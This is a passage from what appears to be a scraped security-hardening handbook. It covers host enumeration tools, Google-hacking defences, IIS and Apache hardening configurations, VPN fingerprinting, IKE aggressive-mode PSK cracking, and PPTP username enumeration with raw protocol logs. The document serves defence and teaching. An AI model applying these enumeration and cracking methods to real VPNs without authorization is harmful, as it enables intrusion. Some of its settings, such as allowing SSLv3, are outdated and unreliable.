  • 130. 302 | P a g e Microsoft Bing (with and without search API): http://search.msn.com It's suggested to use this with API key which improves the amount of results fetched and the plugin speed. • GPG/PGP key databases The following public databases are used: MIT GPG key server: http://pgp.mit.edu:11371 • DNS/WHOIS databases Public WHOIS information database, like RIPE, or DNS snapshot database are used to passively enumerate host name and track his history. The following public databases are used: DNShistory: http://dnshistory.org Domainsdb: http://www.domainsdb.net/ Fbk.de: http://www.bfk.de/ Gigablast: http://www.gigablast.com Netcraft: http://searhdns.netcraft.com Robtex: http://www.robtex.com Tomdns: http://www.tomdns.net Web-max: http://www.web-max.ca Usage You can use hostmap from command line interface with following: ruby hostmap.rb OPTIONS -t TARGET Where TARGET is the IP address of the host against you wants a host discovery and OPTIONS is a list of hostmap's options.
  • 131. 303 | P a g e Detecting Sub Domains Using Google
  • 132. 304 | P a g e Using TXDNS - dictionary Using TXDNS – Brute Force Securing Web Servers According to the research made by Ponemon Institute, web hacking and web based attacks are the most costly for companies. The research results can be seen here:
  • 133. 305 | P a g e These is a techniques rely purely on HTTP traffic to attack and penetrate web servers and application servers. This technique was formulated to demonstrate that having tight firewalls or SSL does not really matter when it comes to web application attacks. The premise of the one-way technique is that only valid HTTP requests are allowed in and only valid HTTP responses are allowed out of the firewall. Components of a generic web application system There are four components in web application systems, namely the web client which is usually a browser, the front-end web server, the application server and for a vast majority of applications, the database server. The following diagram shows how these components fit together.
  • 134. 306 | P a g e The web application server hosts all the application logic, which may be in the form of scripts, objects or compiled binaries. The front-end web server acts as the application interface to the outside world, receiving inputs from the web clients via HTML forms and HTTP, and delivering output generated by the application in the form of HTML pages. Internally, the application interfaces with back-end database servers to carry out transactions. The firewall is assumed to be a tightly configured firewall, allowing nothing but incoming HTTP requests and outgoing HTML replies. Multi-tier architecture In software engineering, multi-tier architecture (often referred to as n-tier architecture) is a client–server architecture in which the presentation, the application processing, and the data management are logically separate processes. For example, an application that uses middleware to service data requests between a user and a database employs multi-tier architecture. The most widespread use of multi-tier architecture is the three-tier architecture. N-tier application architecture provides a model for developers to create a flexible and reusable application. By breaking up an application into tiers, developers only have to modify or add a specific layer, rather than have to rewrite the entire application over. There should be a presentation tier, a business or data access tier, and a data tier. The concepts of layer and tier are often used interchangeably. However, one fairly common point of view is that there is indeed a difference, and that a layer is a logical structuring mechanism for
  • 135. 307 | P a g e the elements that make up the software solution, while a tier is a physical structuring mechanism for the system infrastructure. This architecture ensures high security, when only the presentation tier (web server) is exposed to the internet and communicates internally and securely with the next tier. In order to ensure the Defense-In-Depth concept and principals are implemented, strict firewall rules and filtering mechanisms separate the communication between each tier. Another common concept to reduce the risk exposure factor is to use different platforms and operating systems in each tier, so that a probable attacker won’t have a “Hack One – Hack Them All” chances. The probability of an attacker having remote code execution exploits matching the exact version of the different operating systems in each tier, is of a very low probability. Securing Virtual Hosts – Preventing Detection of Virtual Hosts There are two main techniques: 1. Enforcing the webserver to respond only to the virtual host name
  • 136. 308 | P a g e 2. Removing PTR records that expose subdomain names Using Hostmap Hostmap is to enumerate all the virtual hosts and DNS names of an IP address, and do this in the fastest and detailed way. To achieve this hostmap uses a lot of techniques, some never used by any other tool, combined with development technologies to get the best performances. Features • DNS names and virtual host enumeration • Multiple discovery techniques • Results correlation, aggregation and normalization • Multi thread and event based engine • Platform independent: hostmap an run on GNU/Linux, Microsoft Windows, Apple OSX and in any system where Ruby works. Techniques To enumerate all the alias of a target machine hostmap uses a lot of techniques Based on protocols, exposed services, target weakness, target vulnerabilities, brute forcing techniques, public databases and search engines that an reveal a target's alias. The data are fetched at run time from this data sources using multi thread engine to speed up the fetching phase. All data fetched being aggregated, normalized, correlated and the results are Checked at run time to avoid false positives. The hostmap engine is based on the knowledge of event; each enumeration action can get results, based on type of enumeration action and the type of the results hostmap dynamically choose the next action to take and the next enumeration check to launch. Hostmap uses an adaptive engine written to get much more results possible. The techniques used by hostmap are the following. Protecting against Google Hacking 1. Keep your sensitive data off the web!
  • 137. 309 | P a g e Even if you think you’re only putting your data on a web site temporarily, there’s a good chance that you’ll either forget about it, or that a web crawler might find it. Consider more secure ways of sharing sensitive data such as SSH/SCP or encrypted email. 2. Use meta headers at non-public pages Valid meta robots content values: Googlebot interprets the following robots meta tag values:  NOINDEX - prevents the page from being included in the index.  NOFOLLOW - prevents Googlebot from following any links on the page. (Note that this is different from the link-level NOFOLLOW attribute, which prevents Googlebot from following an individual link.)  NOARCHIVE - prevents a cached copy of this page from being available in the search results.  NOSNIPPET - prevents a description from appearing below the page in the search results, as well as prevents caching of the page.  NOODP - blocks the Open Directory Project description of the page from being used in the description that appears below the page in the search results.  NONE - equivalent to "NOINDEX, NOFOLLOW". <META NAME="ROBOTS" CONTENT="NONE"> 3. Googledork! • Use the techniques outlined in this paper to check your own site for sensitive information or vulnerable files. • Use gooscan from http://johnny.ihackstuff.com) to scan your site for bad stuff, but first get advance express permission from Google! Without advance express permission, Google could come after you for violating their terms of service. The author is currently not aware of the exact implications of such a violation. But why anger the “Goo-Gods”?!? • Check the official googledorks website (http://johnny.ihackstuff.com) on a regular basis to keep up on the latest tricks and techniques. 4. Consider removing your private sites from Google’s index. The Google webmaster FAQ located at http://www.google.com/webmasters/ provides invaluable information about ways to properly protect and/or expose your site to Google. From that page: “Please have the webmaster for the page in question contact us with proof that he/she is indeed the webmaster. This proof must be in the form of a root level page on the site in question, requesting removal from Google. Once we receive the URL that corresponds with this root level page, we will remove the offending
  • 138. 310 | P a g e page from our index.” In some cases, you may want to rome individual pages or snippets from Google’s index. This is also a straightforward process which can be accomplished by following the steps outlined at http://www.google.com/remove.html. 5. Use a robots.txt file. Web crawlers are supposed to follow the robots exclusion standard found at http://www.robotstxt.org/wc/norobots.html. This standard outlines the procedure for “politely requesting” that web crawlers ignore all or part of your website. I must note that hackers may not have any such scruples, as this file is certainly a suggestion. The major search engine’s crawlers honor this file and it’s contents. For examples and suggestions for using a robots.txt file, see the above URL on robotstxt.org. Securing IIS 7/7.5 + Microsoft SQL Server 2008 IIS Dynamic IP Restrictions Module: The mod_evasive of IIS IIS has got a module which is the exact similar of the well-known Apache module, mod_evasive. These modules automatically detect a user’s diversion from a normal user activity and immediately block it for a certain amount of time. This is very useful to deny basic Denial of Service attacks and to give a hard time to someone who is crawling/Spidering your website to find hidden pages and vulnerabilities. It can be downloaded here: http://www.iis.net/download/dynamiciprestrictions The installation is practically “Next Next”, Thanks to the “Web Platform Installer”
  • 139. 311 | P a g e Hardening IIS SSL with IISCrypto – Disabling Weak Ciphers The free IISCrypto tool can be downloaded at: https://www.nartac.com/Products/IISCrypto/Default.aspx The IIS HTTPS (SSL) Server can be hardened to support FIPS 140-2 or PCI-DSS SSL security level in 1 single click!
  • 140. 312 | P a g e Hardening IIS 7.5 on Windows 2008 Server R2 SP1 The default IIS 7.5 installation does not include the IIS-Metabase Package, which is required for installing URLScan (current version 3.1). The IIS-Metabase package can be installed by: CMD /C START /w PKGMGR.EXE /l:log.etw /iu:IIS-Metabase It turns out that in IIS 7.5, URLScan will not run “out of the box” since it was installed. It must be configured to be at the bottom of the ISAPI Filter chain for it to operate properly:
  • 141. 313 | P a g e Then can configure “%windir%system32inetsrvurlscanurlscan.ini” to report it as Apache Redirecting all requests from HTTP to HTTPS using IIS RewriteModule is done in the following sequence:
  • 142. 314 | P a g e Disabling Caching of Pages (will be applied for any page under that website, so make sure you are configuring the HTTPS one) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,max-age=0 Pragma: no-cache Adding Browser Security Related HTTP Headers: X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff
  • 143. 315 | P a g e It looks like this: Finally, we can test to see how it actually reacts: telnet <server> 80 GET / HTTP/1.0 And see: HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max- age=0 Pragma: no-cache X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=999999999; includeSubdomains X-Frame-Options: deny Access-Control-Allow-Origin: http://www.xyz.com Access-Control-Allow-Methods: POST, GET Access-Control-Max-Age: 99999999 Server: Apache Date: Thu, 12 May 2011 10:46:48 GMT Connection: close Content-Length: 155
  • 144. 316 | P a g e 1.1. URLScan – Free By Microsoft http://www.iis.net/download/UrlScan 1.2. WebKnight – free Host Based Web Application Firewall http://www.aqtronix.com/?PageID=99#Download 1.3. Dynamic IP Restrictions – Beta) Anti DOS, DDOS and Web Crawling( http://www.iis.net/download/DynamicIPRestrictions 1.4. Advanced Logging http://www.iis.net/download/AdvancedLogging Securing Apache Apache Hardening Apache SSL Hardening: In path: /etc/httpd/conf.d/ssl.conf Change: # Make sure the SSL Engine is on, especially since we need a proxy SSLEngine on SSLProxyEngine on # Make sure SSL is forcefully required SSLOptions +StrictRequire # Only accept SSL version 3 (don’t accept SSL v2…) and TLS (which is better) SSLProtocol -all +SSLv3 +TLSv1 SSLProxyProtocol -all +SSLv3 +TLSv1 # Only accept high security ciphers (Don’t accept low, medium and null ciphers) SSLCipherSuite HIGH # Make the SSL Seed Entropy stronger SSLRandomSeed startup file:/dev/urandom 4096 # 1024 on a slow CPU server # 2048 no a normal CPU server
  • 145. 317 | P a g e # 4096 on a fast CPU server SSLRandomSeed connect file:/dev/urandom 2048 # Define custom logs and change log file name to be unpredictable CustomLog /var/log/httpd/mycompany_ssl_request_log "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x "%r" %b" # Change the default name of the log files, to make their path unpredictable ErrorLog /var/log/httpd/mycompany_ssl_error_log TransferLog /var/log/httpd/mycompany_ssl_access_log LogLevel warn # Verify the remote SSL server’s certificate validity, on SSL Proxy connections SSLProxyVerify require # Make sure there will be no Man-In-The-Middle Attacks on SSL Renegotiations SSLInsecureRenegotiation off Remove: # This slows down the server’s performance and is mostly not required <Files ~ ".(cgi|shtml|phtml|php3?)$"> SSLOptions +StdEnvVars </Files> <Directory "/var/www/cgi-bin"> SSLOptions +StdEnvVars </Directory> Mod_Evasive – Anti-D.O.S Apache Module # we need “apxs” to compile mod_evasive, It should be in one of the following /usr/local/psa/admin/bin/apxs /usr/sbin/apxs # If it wasn’t found we can find it manually locate apxs | grep bin # Download mod_evasive wget http://www.zdziarski.com/projects/mod_evasive/mod_evasive_1.10.1.tar.gz
  • 146. 318 | P a g e # Extract mod_evasive source files tar xvzf mod_evasive_1.10.1.tar.gz mod_evasive/ # Compile mod_evasive /usr/sbin/apxs -cia /usr/src/mod_evasive/mod_evasive20.c # Check mod_evasive is configured to be loaded in the apache configuration file grep -i evasive /etc/httpd/conf/httpd.conf #Add the following optimized rules at the end of /etc/httpd/conf/httpd.conf: <IfModule mod_evasive20.c> DOSHashTableSize 3097 DOSPageCount 100 DOSSiteCount 500 DOSPageInterval 1 DOSSiteInterval 1 DOSBlockingPeriod 600 </IfModule> # Restart apache so mod_evasive will be loaded into it on process initiation /etc/init.d/httpd restart # Due to application interference - Disabling mod_evasive! # Comment out the following: “Include conf/mod_evasive20.conf” SELinux – Optional Hardening: SELinux Apache Hardening # Change context of “/var/www/html” to “apache_sys_content_t” chcon -R -t httpd_sys_content_t /var/www/html # Define all new create files with the same matching context type semanage fcontext -a -t httpd_sys_content_t /var/www/html # Change context of “/var/log/httpd” to “apache_log_t” chcon -R -t httpd_log_t /var/log/httpd # Define all new create files with the same matching context type semanage fcontext -a -t httpd_log_t /var/log/httpd
  • 147. 319 | P a g e # Enforcing SELinux Rules echo 1 >/selinux/enforce # Restarting Tomcat after SELinux: cd /home/dominodf/home/dominodf/DigitalFuel-Tomcat/DigitalFuel-7.0/Domino_Live/ && /home/dominodf/home/dominodf/DigitalFuel-Tomcat/DigitalFuel- 7.0/Domino_Live/shutdown.sh && /home/dominodf/home/dominodf/DigitalFuel- Tomcat/DigitalFuel-7.0/Domino_Live/startup.sh SELinux for other services (Experts Only) Enable Hardened HTTP setsebool -P httpd_builtin_scripting 1 setsebool -P httpd_can_network_connect_db 1 setsebool -P httpd_can_network_connect 1 setsebool -P httpd_can_sendmail 1 setsebool -P httpd_can_network_relay 1 setsebool -P httpd_enable_cgi 1 setsebool -P httpd_enable_homedirs 1 setsebool -P allow_httpd_sys_script_anon_write 1 setsebool -P allow_httpd_anon_write 1 setsebool -P httpd_suexec_disable_trans 1 setsebool -P httpd_tty_comm 0 setsebool -P httpd_unified 0 setsebool -P httpd_enable_ftp_server 0 setsebool -P allow_httpd_bugzilla_script_anon_write 0 setsebool -P allow_httpd_mod_auth_pam 0 setsebool -P allow_httpd_nagios_script_anon_write 0 setsebool -P allow_httpd_prewikka_script_anon_write 0 setsebool -P allow_httpd_squid_script_anon_write 0 setsebool -P httpd_disable_trans 1 setsebool -P httpd_rotatelogs_disable_trans 1 setsebool -P httpd_ssi_exec 0 setsebool -P httpd_use_cifs 0 setsebool -P httpd_use_nfs 0 Limiting Flash, Java & JavaScript http://flash.melameth.com/togflash.msi
  • 148. 320 | P a g e
  • 149. 321 | P a g e
  • 150. 322 | P a g e Email protection & filtering  Disable inbound spoofing
  • 151. 323 | P a g e
  • 152. 324 | P a g e
  • 153. 325 | P a g e Sending Spoofed Emails – Bypassing SPF with a 8$ Domain  Attachment filtering by content type and extension detection & matching  Using multiple anti-virus engines  Consider Domain Whitelisting by manual moderation
  • 154. 326 | P a g e VPN Security Identifying VPNs & Firewalls (Fingerprinting VPNS) In the last decade, Virtual Private Networks (VPN) became the most commonly deployed solution for users to work remotely. Providing the user a full, remote network level connection to the company’s LAN is the extremely dangerous, since the LAN is known to be organizations “weak stomach”. However, most organizations require some people to work from home and their field technicians and salesmen to connect into company’s internal resources. The alternative solution to VPN is Port Forwarding, this solution means opening direct access from the internet to an internal system, making it accessible and attackable by anyone. For certain internal systems, which are sometimes old or self-developed and lack the required security level required for internet exposure. Opening access to such system is too dangerous and lacks the flexibility of multiple people connecting to the same port and getting redirected to different machines, for services such as Remote Desktop, where is one should to be forwarded to his own local computer. VPN solves these security risks where nothing is exposed to the internet except for the company’s VPN server, which is usually integrated into the Firewall. The only risk left is hacking into the company’s LAN by attacking the VPN server itself or guessing the credentials of an authorized remote access VPN user. Like any other server product, each manufacturer’s VPN server replies differently the same request, which means it can be distinguished from other products and finally identified. The most advanced VPN fingerprinting tool is IKE-Scan, created by http://nta-monitor.com. IKE-Scan allows attackers to remotely identify the VPN product used by the target company, analyzing the server’s responses to IKE (Internet Key Exchange) Protocol requests.
  • 155. 327 | P a g e Offline password cracking Once a valid password is obtained using IKE Aggressive Mode it is possible to obtain a hash from the VPN server and use this to mount an offline attack to crack the associated passwords. As
  • 156. 328 | P a g e this attack is offline, it does not show on the VPN server log or cause account lockout. It is also extremely fast - typically several hundred thousand guesses per second:  A six character password using letters from A-Z, which has a possible 309 million combinations, can be cracked by brute force in 16 minutes  A six character password using letters and numbers, with a possible 57 billion combinations, can be cracked in two days. VPNs are an attractive target to hackers as they carry sensitive information over an insecure network and remote access VPNs often allow full access to the internal network, while VPN traffic is usually invisible to IDS monitoring. With increasing security in other areas e.g. more organizations installing firewalls, moving Internet servers onto the DMZ and automatically patching servers, the VPN becomes a more tempting target. Scanning for “listening on TCP port 990, finds a Brute-Force-able Check Point Firewall VPN:
  • 157. 329 | P a g e On some implementations it is reconfigured to listen on port 80:
  • 158. 330 | P a g e Identifying Check Point VPN-1 Edge Portal VPN IKE User Enumeration Many remote access VPNs have vulnerabilities that allow valid usernames to be guessed through a dictionary attack, because they respond differently to valid and invalid usernames. One of the basic requirements of a username/password authentication scheme is that an incorrect login attempt should not leak information as to whether the username or password was incorrect, because the attacker can then deduce if the username is valid or not. However, many VPN implementations ignore this rule. The fact that VPN usernames are often based on people's names or email addresses makes it relatively easy for an attacker to use a dictionary attack to recover a number of valid usernames in a short period of time.
  • 159. 331 | P a g e VPN PPTP User Enumeration Allow remote user access through the use of the PPTP VPN service. When enabled this can normally be detected remotely through the presence of an open TCP port (1723) and the device s acceptance of the GRE protocol (IP protocol number 47). The PPTP VPN service uses MS-CHAPv2 for authentication. This relies on a challenge/response mechanism in order to successfully authenticate users. When a remote user attempts to authenticate with the PPTP VPN service, an MS-CHAPv2 packet should be returned indicating success or failure. Failure is indicated by the return of a code 4 MS-CHAPv2 packet. This packet will additionally contain a value in the form E=<error_number> which indicates the type of error that occurred. A list of common error codes is given below: - 646 ERROR_RESTRICTED_LOGON_HOURS 647 ERROR_ACCT_DISABLED 648 ERROR_PASSWD_EXPIRED 649 ERROR_NO_DIALIN_PERMISSION 691 ERROR_AUTHENTICATION_FAILURE 709 ERROR_CHANGING_PASSWORD The vulnerability occurs as a consequence of differences in the error codes returned in the failure packet which are dependent on whether or not the username supplied is valid. When a valid username is given with an incorrect password the following response is returned: - sent [LCP ConfReq id=0x1 <asyncmap 0x0> <magic 0x444fc9b9> <accomp>] rcvd [LCP ConfReq id=0x1 <mru 338> <auth chap MS-v2> <magic 0xfa52b227> <pcomp> <accomp>] sent [LCP ConfRej id=0x1 <pcomp>] rcvd [LCP ConfRej id=0x1 <asyncmap 0x0>] sent [LCP ConfReq id=0x2 <magic 0x444fc9b9> <accomp>] rcvd [LCP ConfReq id=0x2 <mru 338> <auth chap MS-v2> <magic 0xfa52b227> <accomp>] sent [LCP ConfAck id=0x2 <mru 338> <auth chap MS-v2> <magic 0xfa52b227> <accomp>] rcvd [LCP ConfAck id=0x2 <magic 0x444fc9b9> <accomp>] sent [LCP EchoReq id=0x0 magic=0x444fc9b9] rcvd [CHAP Challenge id=0x1 <d15340ea7112ac46f240e4f18fe2a278>, name = "watchguard"] sent [CHAP Response id=0x1 <73469ca9bed04ea6f0e5d1be49b47a1a0000000000000000f424ac68e12 31f756e1657a2bc25efcd3b7ba78110bcf48201>, name = "valid_username"] rcvd [LCP EchoRep id=0x0 magic=0xfa52b227] rcvd [CHAP Failure id=0x1 "E=691 R=1 Try again"] MS-CHAP authentication failed: E=691 Authentication failure CHAP authentication failed
  • 160. 332 | P a g e However, when an invalid username is supplied, the following response is received: - sent [LCP ConfReq id=0x1 <asyncmap 0x0> <magic 0x9689f323> <accomp>] rcvd [LCP ConfReq id=0x1 <mru 338> <auth chap MS-v2> <magic 0x245cdcee> <pcomp> <accomp>] sent [LCP ConfRej id=0x1 <pcomp>] rcvd [LCP ConfRej id=0x1 <asyncmap 0x0>] sent [LCP ConfReq id=0x2 <magic 0x9689f323> <accomp>] rcvd [LCP ConfReq id=0x2 <mru 338> <auth chap MS-v2> <magic 0x245cdcee> <accomp>] sent [LCP ConfAck id=0x2 <mru 338> <auth chap MS-v2> <magic 0x245cdcee> <accomp>] rcvd [LCP ConfAck id=0x2 <magic 0x9689f323> <accomp>] sent [LCP EchoReq id=0x0 magic=0x9689f323] rcvd [CHAP Challenge id=0x1 <d15340ea7112ac46f240e4f18fe2a278>, name = "watchguard"] sent [CHAP Response id=0x1 <73469ca9bed04ea6f0e5d1be49b47a1a0000000000000000f424ac68e12 31f756e1657a2bc25efcd3b7ba78110bcf48201>, name = "invalid_username"] rcvd [LCP EchoRep id=0x0 magic=0x245cdcee] rcvd [CHAP Failure id=0x1 "E=649 R=1 Try again"] MS-CHAP authentication failed: E=649 CHAP authentication failed VPN Clients Man-In-The-Middle Downgrade Attacks Downgrade Attacks - IPSEC Failure MITM attackers may impede the key material exchanged on UDP Port 500 to deceive the victims into thinking that an IPSEC connection cannot start on the other side. That would result in the clear text stream over the connection without being noticed if the victim host is configured in rollback mode. Downgrade Attacks – PPTP During the protocol negotiation phase at the beginning of a PPTP session, MITM attackers may force the victims to use the less secure PAP authentication, MSCHAP V1 (i.e., downgrading from MSCHAP V2), and even no encryption at all.
  • 161. 333 | P a g e Attackers can also force re-negotiation (Terminate-Ack packet in clear text), steal passwords from existing tunnels, and repeat previous attacks. Attackers can compel "password change" to get password hashes that can be utilized directly by a modified SMB or PPTP client. MSCHAP V1 hashes can also be foreseen. PPTP: PPTP (Point-to-Point Tunneling Protocol) is a protocol for VPN implementation. Microsoft MSCHAP-V2 or EAP-TLS is used to authenticate PPTP connections. The EAP-TLS (Extensible Authentication Protocol-Transport Layer Security) is certificate based, and thus is a safer security option for PPTP than MSCHAP-V2. PPTP Brute Force
  • 162. 334 | P a g e Hacking VPNs with “Aggressive Mode Enabled”
  • 163. 335 | P a g e
  • 164. 336 | P a g e Secure VPN In-Secure VPN
  • 165. 337 | P a g e
  • 166. 338 | P a g e Got PSK Key (SHA1 Password Hash)
  • 167. 339 | P a g e Cracked PSK Key (Full Brute Force Attack – 1 hour on Intel I7) Downloading Checkpoint Secure Client
  • 168. 340 | P a g e
  • 169. 341 | P a g e Attacking hosts in the internal network – remotely Endpoint Security  Device Control  Application Control  Data Loss Prevention Penetration tests and red team exercises  Examples  Case Studies Implementing identity & access management creating backups, BCP & DRP
  • 170. 342 | P a g e  Onsite storage  offsite storage  secured access to backups  scheduling backups Security Metrics  Measuring the effectiveness of investments  Formal it control review  Cost-benefit perspective  Implementation issues  Commitment to continued improvement Incident Reponses  Identifying the probable risks  defining the incident assurance factors  Defining the contacts and personnel per incident type  developing your security threat response plan Creating an audit  Defining the scope of your audit: creating asset lists and a security perimeter  What is the security perimeter?  Assets to consider creating a 'threats list' what threats to include?  Common 'threats' to get you started?  Past due diligence & predicting the future  Examining your threat history  checking security trends  checking with your competition  Prioritizing your assets & vulnerabilities  Perform a risk calculation/ probability calculation  calculating probability  calculating harm
  • 171. 343 | P a g e Conclusions  Periodic and continual testing of controls o As the security world is a very dynamic environment and new attack methods and techniques are invented every day, the security controls must be updated constantly o Engine/Product physical level upgrade every few years o Controls must be tested at least quarterly  Future evolution of the 20 critical controls o In the future most controls will integrate into the SIEM o The SIEM will be the main operation center and will activate most of the controls, according the rules defined o All controls are going to be focus on the application layer, mostly on Web systems o Desktop clients will almost disappear o Attacks will be more high level and logical, the security will focus more and more on understanding systems and less about technical bugs and vulnerabilities o At some point, in order to mitigate complex logical vulnerabilities, controls will integrate “Artificial Intelligence” o The mobile world will integrate into the classical PC and network environment and will ultimately replace most PCs or/and Laptops  Summary and action plan o Information Security is a repetitive process o Information Security Controls are the tools, they need the right setup, the right rules and periodical maintenance o It is not right to buy 10 different solution and store them in a box inside a closet o Every solution has to slowly implemented and integrated, one by one o Compliance is the best tool of an information security manager to get management support to mitigate security issues o Real-Time monitoring of the critical systems, with the right rules and the personnel reacting to these events are more valuable than most security controls